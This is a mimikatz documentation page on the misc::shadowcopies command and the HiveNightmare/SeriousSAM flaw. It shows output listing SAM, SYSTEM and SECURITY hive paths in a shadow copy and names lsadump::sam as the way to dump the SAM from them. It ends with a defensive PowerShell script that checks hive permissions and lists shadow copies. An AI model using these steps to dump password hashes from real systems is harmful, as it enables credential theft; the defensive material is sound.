shadowcopies

misc::shadowcopies lists the shadow copies available on the system, together with the registry hive files they contain.

The HiveNightmare / SeriousSAM vulnerability was discovered by JonasLyk. According to Will Dormann, BUILTIN\Users had RX (read and execute) access to the SAM hive starting somewhere between Windows 10 1803 and 1809. Because the live hive is locked while Windows is running, regular users could read the copy stored in a shadow copy instead, allowing them to dump the SAM.

mimikatz # misc::shadowcopies

ShadowCopy Volume : HarddiskVolumeShadowCopy12
| Path            : \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12\
| Volume LastWrite: 13/10/2021 10:12:09

* \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12\Windows\System32\config\SYSTEM
  | LastWrite   : 20/10/2021 15:07:53
* \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12\Windows\System32\config\SAM
  | LastWrite   : 20/10/2021 15:07:53
* \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12\Windows\System32\config\SECURITY
  | LastWrite   : 20/10/2021 15:07:53
* \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12\Windows\System32\config\SOFTWARE
  | LastWrite   : 20/10/2021 15:09:00
  
  ...Output Omitted...

lsadump::sam can then be used by passing the shadow copy paths to the /sam and /system parameters.
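From the defender's side, the exposure described above can be checked on a host directly. The following PowerShell script is an added example and is not part of the mimikatz documentation; it assumes it is run with administrative rights and checks the hive ACLs by the well-known SID of BUILTIN\Users (S-1-5-32-545) so that it works on localized systems.

```powershell
# Added example (not from the mimikatz docs): report whether BUILTIN\Users can read
# the SAM, SYSTEM and SECURITY hives, and list shadow copies that may still hold
# a readable copy of those hives even after the live ACL has been corrected.
$UsersSid  = 'S-1-5-32-545'   # well-known SID of BUILTIN\Users
$ConfigDir = Join-Path $env:windir 'System32\config'
$ReadRight = [System.Security.AccessControl.FileSystemRights]::ReadData

$hiveReport = foreach ($hive in 'SAM', 'SYSTEM', 'SECURITY') {
    $path = Join-Path $ConfigDir $hive
    # Get-Acl needs only READ_CONTROL, so it works although the hive itself is locked.
    $acl  = Get-Acl -Path $path

    $usersRead = $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.IdentityReference.Translate(
            [System.Security.Principal.SecurityIdentifier]).Value -eq $UsersSid -and
        (($_.FileSystemRights -band $ReadRight) -eq $ReadRight)
    }

    [pscustomobject]@{
        Hive         = $hive
        Path         = $path
        UsersCanRead = [bool]$usersRead   # $true means the weak ACL is present
    }
}

Write-Host 'Hive ACL check (UsersCanRead = $true indicates the misconfiguration):'
$hiveReport | Format-Table -AutoSize

# Shadow copies preserve the ACL that was in place when they were taken, so each
# one is a candidate to inspect or remove once the live hive ACL has been fixed.
Write-Host 'Existing shadow copies:'
Get-CimInstance -ClassName Win32_ShadowCopy |
    Select-Object ID, DeviceObject, InstallDate |
    Format-Table -AutoSize
```

A host is only fully remediated when every hive reports UsersCanRead = $false and no shadow copy created before the ACL fix remains.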
